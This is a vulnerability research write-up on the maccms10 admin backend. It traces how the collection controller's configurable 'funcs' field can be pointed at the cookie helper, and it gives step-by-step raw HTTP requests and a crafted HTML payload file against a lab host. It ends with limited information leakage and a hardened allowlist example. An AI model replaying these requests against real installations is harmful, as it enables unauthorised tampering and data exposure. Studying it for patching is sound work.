maccms10 backend fake command execution

The latest version of maccms is used for this test.

Command execution (not feasible)

The final trigger point is as follows:

The content_into method of the backend cj controller

[screenshot]

Next we need to check whether the data is controllable.

First, look at the function name.

[screenshot]

Next, look at the parameters.

[screenshot]

They are all read from the database.

The function comes from the ci_node table; look at the insert operation.

We need to find where funcs is controllable, and funcs is indeed controllable.

[screenshot]

But the parameter value cannot be controlled; only a single character can be taken, which is of no practical use.

$v['data'] is not an array but a string.

[screenshot]

On top of that, the argument to function_exists can only be a string, which means internal classes cannot be called.

Set this aside for now. Although command execution is not possible, injection is still possible.

Leaving aside the backend's database operations, if SQL statements were executed directly, the usual approach would still work.

There is a json_decode here, so insert or update also involves an encode, meaning the expression here is still not controllable.

But $program_config['funcs'][$a] can be set to the cookie helper function, which then accepts a fully controllable argument.
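As an added example (not maccms code), this is a hardened version of the dispatch pattern described above: the per-field function name read from program_config['funcs'] is only invoked if it is on an explicit allowlist, so a helper such as cookie cannot be selected. The function names, config JSON and sample data are constructed for illustration.

```php
<?php
// Added example, not maccms code: allowlisted dispatch of the per-field
// transformation function that a collection rule stores in program_config.

// Transformation functions a collection rule is permitted to reference.
const ALLOWED_FUNCS = ['trim', 'strip_tags', 'intval', 'htmlspecialchars'];

/**
 * Apply the configured function for one field. Returns the transformed
 * value, or null when the configured name is rejected. A bare
 * function_exists() check would accept any global helper, including
 * cookie(), which is the weakness the write-up relies on.
 */
function apply_field_func(string $func, string $data): ?string
{
    if ($func === '') {
        return $data;                       // no transform configured
    }
    if (!in_array($func, ALLOWED_FUNCS, true)) {
        error_log("rejected non-allowlisted funcs entry: $func");
        return null;
    }
    return (string) $func($data);
}

// Constructed program_config as it would look after json_decode():
// vod_name uses an allowed function, vod_lang tries to use cookie.
$program_config = json_decode(
    '{"funcs":{"vod_name":"trim","vod_lang":"cookie"}}',
    true
);
$collected = ['vod_name' => '  Example  ', 'vod_lang' => 'zh'];

foreach ($collected as $field => $data) {
    $func   = $program_config['funcs'][$field] ?? '';
    $result = apply_field_func($func, $data);
    printf("%s => %s\n", $field, $result === null ? '[rejected]' : $result);
}
```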

Follow it up.

The concrete reproduction is as follows. Open the backend.

Step 1

Collection -> Custom interface -> Add

[screenshot]

Data added successfully.

[screenshot]

Step 2

Collection -> Custom rules -> Add

[screenshot]

Fill in anything.

[screenshot]

Of course this CMS still has plenty of rough edges; after filling in all the parameters it told me:

[screenshot]

Let's just use the raw request instead, adding whatever is missing.

POST /admin1.php/admin/cj/info.html HTTP/1.1
Host: 192.168.1.220:8113
Content-Length: 755
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.220:8113
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.220:8113/admin1.php/admin/cj/info.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=k7gftrkljk2qub2dki0n7p08ek
Connection: close

data%5Bnodeid%5D=&data%5Bname%5D=aaa&data%5Bsourcecharset%5D=UTF-8&data%5Bmid%5D=2&data%5Bsourcetype%5D=3&data%5Bpage_base%5D=aaa&data%5Bcustomize_config%5D=bbb&data%5Bprogram_config%5D=b&urlpage1=&data%5Bpagesize_start%5D=&data%5Bpagesize_end%5D=&data%5Bpar_num%5D=&urlpage2=&urlpage3=http%3A%2F%2F127.0.0.1%3A8113%2Fa.txt&data%5Burl_contain%5D=aa&data%5Burl_except%5D=bb&data%5Burl_start%5D=cc&data%5Burl_end%5D=dd&data%5Btitle_rule%5D=&data%5Btitle_html_rule%5D=&data%5Btype_rule%5D=&data%5Btype_html_rule%5D=&data%5Bcontent_rule%5D=&data%5Bcontent_html_rule%5D=&data%5Bcontent_page_rule%5D=1&data%5Bcontent_nextpage%5D=&data%5Bcontent_page_start%5D=&data%5Bcontent_page_end%5D=&data%5Bcontent_page%5D=1&data%5Bcoll_order%5D=1&dosubmit=

Data added successfully.

Note the parameters:

  • page_base: anything
  • customize_config: anything
  • program_config: b
  • url_contain: aa
  • url_start: cc
  • url_end: dd

[screenshot]

There were several earlier test records, so the id here is 5.

Then visit the col_url interface.

Since this needs to fetch the configured address, data has to be placed in a.txt:

cc<a href="http://127.0.0.1:8113/aa.txt">bbb</a>dd

Access directly:

http://127.0.0.1:8113/admin1.php/admin/cj/col_url?id=5

[screenshot]

Data will be successfully added to the database.

But since there is no data, this is not what we want.

[screenshot]

Step 3

Update the table.

Write b into bb.txt; actually, anything will do.

[screenshot]

Then the data is added successfully.

[screenshot]

Step 4

Update the value of program_config.

Access directly:

http://192.168.1.220:8113/admin1.php/admin/cj/program?id=5

[screenshot]

This is going to be manual labour.

Looking at the source again, the vod_lang parameter is not subjected to secondary filtering.

All parameters in the method are subjected to secondary filtering.

[screenshot]

But the e configuration is needed; from the left side you can also see that only f and g exist.

Modify the program_config request:

POST /admin1.php/admin/cj/program?id=5 HTTP/1.1
Host: 192.168.1.220:8113
Content-Length: 5864
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.220:8113
Referer: http://192.168.1.220:8113/admin1.php/admin/cj/program?id=5
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=k7gftrkljk2qub2dki0n7p08ek
Connection: close

id=5&model_field%5B0%5D=vod_id&node_field%5B0%5D=title&funcs%5B0%5D=&model_field%5B1%5D=type_id&node_field%5B1%5D=title&funcs%5B1%5D=&model_field%5B2%5D=type_id_1&node_field%5B2%5D=title&funcs%5B2%5D=&model_field%5B3%5D=group_id&node_field%5B3%5D=title&funcs%5B3%5D=&model_field%5B4%5D=vod_name&node_field%5B4%5D=title&funcs%5B4%5D=&model_field%5B5%5D=vod_sub&node_field%5B5%5D=title&funcs%5B5%5D=&model_field%5B6%5D=vod_en&node_field%5B6%5D=title&funcs%5B6%5D=&model_field%5B7%5D=vod_status&node_field%5B7%5D=title&funcs%5B7%5D=&model_field%5B8%5D=vod_letter&node_field%5B8%5D=title&funcs%5B8%5D=&model_field%5B9%5D=vod_color&node_field%5B9%5D=title&funcs%5B9%5D=&model_field%5B10%5D=vod_tag&node_field%5B10%5D=title&funcs%5B10%5D=&model_field%5B11%5D=vod_class&node_field%5B11%5D=title&funcs%5B11%5D=&model_field%5B12%5D=vod_pic&node_field%5B12%5D=title&funcs%5B12%5D=&model_field%5B13%5D=vod_pic_thumb&node_field%5B13%5D=title&funcs%5B13%5D=&model_field%5B14%5D=vod_pic_slide&node_field%5B14%5D=title&funcs%5B14%5D=&model_field%5B15%5D=vod_pic_screenshot&node_field%5B15%5D=title&funcs%5B15%5D=&model_field%5B16%5D=vod_actor&node_field%5B16%5D=title&funcs%5B16%5D=&model_field%5B17%5D=vod_director&node_field%5B17%5D=title&funcs%5B17%5D=&model_field%5B18%5D=vod_writer&node_field%5B18%5D=title&funcs%5B18%5D=&model_field%5B19%5D=vod_behind&node_field%5B19%5D=title&funcs%5B19%5D=&model_field%5B20%5D=vod_blurb&node_field%5B20%5D=title&funcs%5B20%5D=&model_field%5B21%5D=vod_remarks&node_field%5B21%5D=title&funcs%5B21%5D=&model_field%5B22%5D=vod_pubdate&node_field%5B22%5D=title&funcs%5B22%5D=&model_field%5B23%5D=vod_total&node_field%5B23%5D=title&funcs%5B23%5D=&model_field%5B24%5D=vod_serial&node_field%5B24%5D=title&funcs%5B24%5D=&model_field%5B25%5D=vod_tv&node_field%5B25%5D=title&funcs%5B25%5D=&model_field%5B26%5D=vod_weekday&node_field%5B26%5D=title&funcs%5B26%5D=&model_field%5B27%5D=vod_area&node_field%5B27%5D=title&funcs%5B27%5D=&model_field%5B28%5D=vod_lang&node_field%5B28%5D=title&
funcs%5B28%5D=cookie&model_field%5B29%5D=vod_year&node_field%5B29%5D=title&funcs%5B29%5D=&model_field%5B30%5D=vod_version&node_field%5B30%5D=title&funcs%5B30%5D=&model_field%5B31%5D=vod_state&node_field%5B31%5D=title&funcs%5B31%5D=&model_field%5B32%5D=vod_author&node_field%5B32%5D=title&funcs%5B32%5D=&model_field%5B33%5D=vod_jumpurl&node_field%5B33%5D=title&funcs%5B33%5D=&model_field%5B34%5D=vod_tpl&node_field%5B34%5D=title&funcs%5B34%5D=&model_field%5B35%5D=vod_tpl_play&node_field%5B35%5D=title&funcs%5B35%5D=&model_field%5B36%5D=vod_tpl_down&node_field%5B36%5D=title&funcs%5B36%5D=&model_field%5B37%5D=vod_isend&node_field%5B37%5D=title&funcs%5B37%5D=&model_field%5B38%5D=vod_lock&node_field%5B38%5D=title&funcs%5B38%5D=&model_field%5B39%5D=vod_level&node_field%5B39%5D=title&funcs%5B39%5D=&model_field%5B40%5D=vod_copyright&node_field%5B40%5D=title&funcs%5B40%5D=&model_field%5B41%5D=vod_points&node_field%5B41%5D=title&funcs%5B41%5D=&model_field%5B42%5D=vod_points_play&node_field%5B42%5D=title&funcs%5B42%5D=&model_field%5B43%5D=vod_points_down&node_field%5B43%5D=title&funcs%5B43%5D=&model_field%5B44%5D=vod_hits&node_field%5B44%5D=title&funcs%5B44%5D=&model_field%5B45%5D=vod_hits_day&node_field%5B45%5D=title&funcs%5B45%5D=&model_field%5B46%5D=vod_hits_week&node_field%5B46%5D=title&funcs%5B46%5D=&model_field%5B47%5D=vod_hits_month&node_field%5B47%5D=title&funcs%5B47%5D=&model_field%5B48%5D=vod_duration&node_field%5B48%5D=title&funcs%5B48%5D=&model_field%5B49%5D=vod_up&node_field%5B49%5D=title&funcs%5B49%5D=&model_field%5B50%5D=vod_down&node_field%5B50%5D=title&funcs%5B50%5D=&model_field%5B51%5D=vod_score&node_field%5B51%5D=title&funcs%5B51%5D=&model_field%5B52%5D=vod_score_all&node_field%5B52%5D=title&funcs%5B52%5D=&model_field%5B53%5D=vod_score_num&node_field%5B53%5D=title&funcs%5B53%5D=&model_field%5B54%5D=vod_time&node_field%5B54%5D=title&funcs%5B54%5D=&model_field%5B55%5D=vod_time_add&node_field%5B55%5D=title&funcs%5B55%5D=&model_field%5B56%5D=vod_time_hits&node_field%
5B56%5D=title&funcs%5B56%5D=&model_field%5B57%5D=vod_time_make&node_field%5B57%5D=title&funcs%5B57%5D=&model_field%5B58%5D=vod_trysee&node_field%5B58%5D=title&funcs%5B58%5D=&model_field%5B59%5D=vod_douban_id&node_field%5B59%5D=title&funcs%5B59%5D=&model_field%5B60%5D=vod_douban_score&node_field%5B60%5D=title&funcs%5B60%5D=&model_field%5B61%5D=vod_reurl&node_field%5B61%5D=title&funcs%5B61%5D=&model_field%5B62%5D=vod_rel_vod&node_field%5B62%5D=title&funcs%5B62%5D=&model_field%5B63%5D=vod_rel_art&node_field%5B63%5D=title&funcs%5B63%5D=&model_field%5B64%5D=vod_pwd&node_field%5B64%5D=title&funcs%5B64%5D=&model_field%5B65%5D=vod_pwd_url&node_field%5B65%5D=title&funcs%5B65%5D=&model_field%5B66%5D=vod_pwd_play&node_field%5B66%5D=title&funcs%5B66%5D=&model_field%5B67%5D=vod_pwd_play_url&node_field%5B67%5D=title&funcs%5B67%5D=&model_field%5B68%5D=vod_pwd_down&node_field%5B68%5D=title&funcs%5B68%5D=&model_field%5B69%5D=vod_pwd_down_url&node_field%5B69%5D=title&funcs%5B69%5D=&model_field%5B70%5D=vod_content&node_field%5B70%5D=title&funcs%5B70%5D=&model_field%5B71%5D=vod_play_from&node_field%5B71%5D=title&funcs%5B71%5D=&model_field%5B72%5D=vod_play_server&node_field%5B72%5D=title&funcs%5B72%5D=&model_field%5B73%5D=vod_play_note&node_field%5B73%5D=title&funcs%5B73%5D=&model_field%5B74%5D=vod_play_url&node_field%5B74%5D=title&funcs%5B74%5D=&model_field%5B75%5D=vod_down_from&node_field%5B75%5D=title&funcs%5B75%5D=&model_field%5B76%5D=vod_down_server&node_field%5B76%5D=title&funcs%5B76%5D=&model_field%5B77%5D=vod_down_note&node_field%5B77%5D=title&funcs%5B77%5D=&model_field%5B78%5D=vod_down_url&node_field%5B78%5D=title&funcs%5B78%5D=&model_field%5B79%5D=vod_plot&node_field%5B79%5D=title&funcs%5B79%5D=&model_field%5B80%5D=vod_plot_name&node_field%5B80%5D=type&funcs%5B80%5D=&model_field%5B81%5D=vod_plot_detail&node_field%5B81%5D=content&funcs%5B81%5D=

Step 5

Modify the configuration.

[screenshot]

Modified successfully.

[screenshot]

But in the end there is still only one controllable key in the insert method.

[screenshot]

Based on earlier research,

it can leak some database users and names. Not much use; not pursuing it further.